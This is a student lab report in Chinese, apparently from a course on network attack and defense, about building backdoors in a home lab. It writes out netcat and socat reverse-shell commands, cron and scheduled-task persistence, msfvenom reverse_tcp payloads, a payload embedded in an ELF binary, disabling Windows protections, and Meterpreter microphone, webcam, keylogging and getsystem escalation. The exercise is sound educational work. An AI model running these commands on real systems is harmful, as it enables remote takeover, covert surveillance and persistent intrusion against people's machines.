当前位置: 首页 > news >正文

20232309 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

1.1学习内容

1.后门的概念,案例
2.Metasploit Framework的基本组成

  • 基础库文件
  • 模块(Exploits、Payloads等)
  • 功能程序(msfvenom等)
  • 其他

重点学习了msfvenom(支持生成各种平台的 payload 文件)的使用

3.netcat/socat工具的使用

1.2问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?
用户下载盗版软件并安装运行,攻击者利用操作系统漏洞注入恶意代码安装后门等

2.例举你知道的后门如何启动起来(win及linux)的方式?
win:注册表启动、计划任务启动、文件夹启动、服务启动
Linux:安插脚本启动、篡改用户配置文件启动、计划任务启动、SSH后门

3.Meterpreter有哪些给你印象深刻的功能?
payload功能十分强大,针对不同系统都能对症下药,种类很多样;record_mic和webcam_snap可以获取音频和照片还挺好玩的

4.如何发现自己有系统有没有被安装后门?

  • 检查启动项和计划任务
  • 检查服务
  • 检查网络连接
  • 检查防火墙规则
  • 检查系统文件完整性
  • 还有很多....

1.3实验任务

  • 使用netcat获取虚拟机操作Shell,cron启动某项任务

  • 使用socat获取主机操作Shell, 任务计划启动

  • 使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

  • 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

2.实验过程

2.1使用netcat获取虚拟机操作Shell,cron启动某项任务

1.主机下载netcat工具,在windows的命令行界面中用ipconfig查看主机ip地址
image

2.进入netcat解压后的目录,主机执行.\nc.exe -l -p 8888监听,虚拟机执行nc 172.16.177.223 8888 -e /bin/sh 连接到主机ip端口执行shell

-l listen监听;-p 端口号;-e 执行指定程序

image
可以看到主机成功获取虚拟机shell

3.设置cron定时任务
(别忘了先sudo systemctl start cron启用cron!)虚拟机用crontab -e打开crontab文件,设置定时任务,初次进入需要选择一个编辑器
在文件的最下面添加* * * * * /bin/netcat 172.16.177.223 8888 -e /bin/sh

五个*依次代表每分钟,每小时,每日,每月,星期几;后续为linux的定时任务执行指令内容(此处为通过netcat连接主机ip端口打开自己的shell)

image

完成后保存退出,可以看到shell显示(此处截图有误,虚拟机上不应该有最后一行指令,到了设定时间应该可以自动在主机上获得shell)

image

2.2使用socat获取主机操作Shell, 任务计划启动

1.查看虚拟机ip

d883653f-abd3-4ddc-a4bf-e3f3a55c4866

2.不设置定时任务,kali虚拟机输入命令socat TCP-LISTEN:8888 -进行监听
主机进入socat目录执行socat.exe exec:cmd.exe,pty,stderr TCP:192.168.5.12:8888建立反弹后门(执行cmd并发送到虚拟机),可以看到虚拟机连接到主机的shell但是主机没有变化

exec:cmd.exe:执行Windows命令提示符
pty:分配伪终端(Pseudo Terminal)
stderr:将标准错误重定向到相同输出

image
可以在虚拟机输入命令操作主机(chcp 65001可解决乱码问题

image

3.虚拟机同上步骤打开监听,启动主机任务计划程序,创建任务

e4ad002d1b113966faa842f4f3fe4bf8
在常规界面设置名称,在触发器界面设置时间,在操作界面设置socat路径和参数exec:powershell.exe,pipes TCP:192.168.xxx(虚拟机的ip):8888 最后确定

8507a050c2f95c59a8130cf418a51062

4.回到任务计划程序主页,点击任务计划程序库可以看到刚刚设置的任务,到预定时间时虚拟机就会自动出现主机shell
83b5aa9c4b756a529741b6b29ff52365

验证:在虚拟机界面输入ipconfig,可以看到显示的是主机ip

74709acc495a0e480c68ea6f091293a7

2.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

1.生成可执行文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.23 LPORT=8888 -f exe > meter_backdoor20232309.exe

-p 选择载荷(注意被攻击的windows系统位数,此处用x64位载荷);LHOST 攻击者(此处为虚拟机)的ip ;LPORT 攻击者监听端口;-f 输出文件格式

屏幕截图 2025-10-18 193550

2.用ncat传输后门文件
主机设置监听端口,将输入重定向到指定目录下的文件ncat -l -p 2309 > \Users\xxx\Desktop\meter_backdoor20232309.exe
虚拟机将文件定向传输到主机ip监听端口nc 192.168.5.22 2309 < meter_backdoor20232309.exe
可以看到主机对应目录下成功显示刚刚生成的文件,传输成功

f8dab633-635b-4652-8f93-9315b4083bee

(说明:由于网络环境变化,后续截图中ip地址有更改,虚拟机地址ip改为192.168.5.6重复的前面步骤不分不再截图)

3.为了让后门文件在主机上运行,提前关闭防火墙等保护措施,并且要关完全

image

image

image

image

4.虚拟机输入msfconsole进入控制台,出现msf>标识后输入use exploit/multi/handler设置攻击机的监听器
以下设置要和1.中生成文件的内容 完全一样! 要仔细检查哦
set payload windows/x64/meterpreter/reverse_tcp设置攻击载荷(reverse指反向即被攻击机会主动向攻击机发送信息)
set LHOST 192.168.5.6设置攻击机ip
set LPORT 8888设置攻击机监听端口
exploit打开监听,主机运行后门文件
(下列截图中体现了没有仔细检查handler设置完全一致的后果就是出现如图的died报错,具体文字解释见本文3.问题及解决方案
54dc9861-aa41-4332-a15a-1ca5dfcda338

连接成功后可以看到攻击机获取了主机shell,并能运行命令

image

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

1.使用命令record_mic -d 5获取目标主机麦克风录制5s音频,webcam_snap获取目标主机摄像头拍摄照片,结果如下(需要打开本机相关权限),打开文件夹可看到相应的音频和照片
image

2.使用keyscan_start开启击键记录,这里在微信聊天框输入文字,使用keyscan_dump打印出记录到的键盘输入,可以看到显示了刚才打印的文字,keyscan_stop停止记录

image

3.输入getuid查看当前用户,getsystem尝试提权,再次getuid查看显示Server username: NT AUTHORITY\SYSTEM,说明提权成功,getprivs查看当前特权列表

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).含义:

·Named Pipe Impersonation:命名管道模拟(创建一个命名管道服务器,诱使高权限进程(通常是SYSTEM权限)连接到该管道,模拟连接客户端的权限令牌,获得SYSTEM级别的访问权限)
·In Memory:提权操作仅在内存中完成,没有在磁盘上创建文件
·Admin:执行此操作需要当前已经具备管理员权限

image

2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.执行命令,用pwn1模版生成能获取反弹连接的shellcode,并输出到elf格式的文件msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.5.6 LPORT=6666 -x pwn1 -f elf > exp2_pwn20232309

因为pwn1是elf格式的可执行文件,只能在Linux系统上运行,因此选用Linux系统载荷;-x 用于指定一个现有的正常程序作为模板,并将生成的 Payload 嵌入其中

image

2.在另一个终端中打开msf控制台,设置监听器原理同前,设置好后exploit监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.5.6
set LPORT 6666
exploit

在不同的终端执行该注入payload的elf文件(若无执行权限用chmod 777更改即可)

image
可以看到成功获得执行文件的终端Shell,ls可打印出其目录下文件列表验证

3.问题及解决方案

  • 问题1:2.2中虚拟机攻击主机时刚开始主机的反弹式后门无法连接到虚拟机,显示network is unreachable
    image

  • 问题1解决方案:查阅资料得知,在常规情况下虚拟机为桥接模式时应该像一台真实的物理机一样,向主机局域网中的路由器(DHCP服务器)请求一个和主机同网段的地址。但此时虚拟机的ip为169.254.x.x,即故障ip,表示DHCP请求失败。检查发现是连接实验室的网络质量不佳,回到宿舍联网再次实验成功。

  • 问题2:2.3中msf开启监听时报错Meterpreter session 1 is not valid and will be closed
    image

  • 问题2解决方案:使用tail -f /root/.msf4/logs/framework.log查看运行日志,发现提示错误原因为Session 1 failed to negotiate TLV encryption,表示 Meterpreter 会话在加密协商阶段失败了,仔细查看Payload之后发现和设置文件的Payload相比少了一个/x64,修改后连接成功(如果依然出现相同报错,可能是参考资料第二条中提到的问题)

4.学习感悟、思考等

  1. 检查程序有没有运行真的是个好习惯,,,我总是默认程序可以直接输入命令就运行然后半天找不出为什么出错浪费时间......
  2. 程序报错但找不出原因时要学会查看运行日志寻找出错原因,我这个习惯培养得不好,以后要多加注意;也可以查看命令本身格式是否出错
  3. 现代windows系统的安全防护还是很全面的,关了好久才把各种查病毒报警机制都关全
  4. 从网上下载资源或点击链接时都要谨慎,后门威胁无处不在!

参考资料

  • 实验指导书
  • session 1 closed.Reason:Died 的可能解决方案
http://www.hskmm.com/?act=detail&tid=36315

相关文章:

  • 2025年卫衣厂家推荐排行榜,男女款卫衣,春秋季卫衣,加绒卫衣,印花卫衣源头厂家精选推荐
  • 2025年轻触开关/检测开关厂家推荐排行榜,轻触按键开关,防水轻触开关,贴片轻触开关,检测开关源头厂家精选指南
  • 2025年铁氟龙高温线厂家权威推荐榜:极细铁氟龙/UL10064/UL1332/UL1867铁氟龙线材专业选购指南
  • CentOS下安装部署Docker
  • 2025年护栏厂家推荐排行榜:市政护栏,道路护栏,桥梁护栏,小区护栏,锌钢护栏,阳台护栏公司精选
  • 999
  • 2025年发电机组厂家权威推荐榜:柴油发电机、静音发电机组源头企业综合实力与能效表现深度解析
  • 2025年角接触轴承厂家权威推荐榜单:高精度/高承载/高精密/机床主轴/汽车专用/定制/可替代进口/高转速/高刚性轴承全方位解析
  • 极大极小搜索
  • 88
  • 2025年二手发电机厂家推荐排行榜,二手发电机回收,二手发电机买卖,二手发电机买卖回收公司专业推荐
  • 2025年粘度计厂家权威推荐榜:旋转粘度计、落球粘度计、在线粘度计、便携式粘度计专业选购指南
  • 法语NER模型在可再生能源领域的应用
  • 2025年立式TYPE-C母座厂家推荐排行榜,TYPE-C接口,USB-C母座,立式贴片TYPE-C连接器,防水TYPE-C母座公司精选
  • CF2152F Triple Attack
  • 2025年定型机厂家权威推荐榜:拉幅定型机/门富士/节能/余热回收/废气回收/烟气回收/智能排风/双层定型机源头企业综合解析
  • 2025年不锈钢方形水箱厂家权威推荐榜:食品级/消防用/生活水箱专业制造商,304不锈钢方形水箱定制加工实力解析
  • 2025年真空钎焊炉厂家权威推荐榜单:工业级真空热处理设备,真空扩散焊炉,高温钎焊设备专业制造商深度解析
  • 2025年10月办公家具公司推荐:对比评测五强榜,聚焦恺 威家具品质标杆
  • 2025年沈阳酒店电话推荐:北站西塔丽柏宠物友好市中心步行地铁口。
  • 2025年6月防腐木凉亭厂家电话推荐:江西纳美工艺家俱有限公司实地探厂报告
  • 2025年防腐木凉亭厂家电话推荐:江西纳美工艺家俱有限公司实地探厂记
  • 2025年发电机厂家推荐排行榜,发电机组出租,柴油发电机出租,甲醇发电机组租赁,移动式发电机出租,维修保养服务公司推荐
  • 2025年沈阳酒店电话推荐:北站西塔丽柏宠物友好市中心步行地铁口
  • 2025年拖鞋机厂家权威推荐榜:酒店拖鞋生产线、全自动拖鞋机、一次性拖鞋机、酒店一次性拖鞋机器专业选购指南
  • 2025年棒球帽源头厂家权威推荐榜:专业定制与潮流设计,运动棒球帽、时尚棒球帽、防晒棒球帽、品牌棒球帽公司精选!
  • 2025年栏杆护栏厂家权威推荐榜:不锈钢栏杆、桥梁防撞护栏、河道景观护栏最新选购指南与实力解析
  • 2025年兄弟机床维修厂家权威推荐榜:专业维修、快速响应、技术精湛,兄弟机床维修优质厂家一站式服务指南
  • 【GitHub每日速递 251022】81.2k star, Bun:替代 Node.js 的全栈 JavaScript 神器,快速上手攻略来了!
  • 2025年电主轴精密球轴承厂家推荐排行榜:高精度主轴轴承,机床主轴专用轴承,高速电主轴轴承公司口碑之选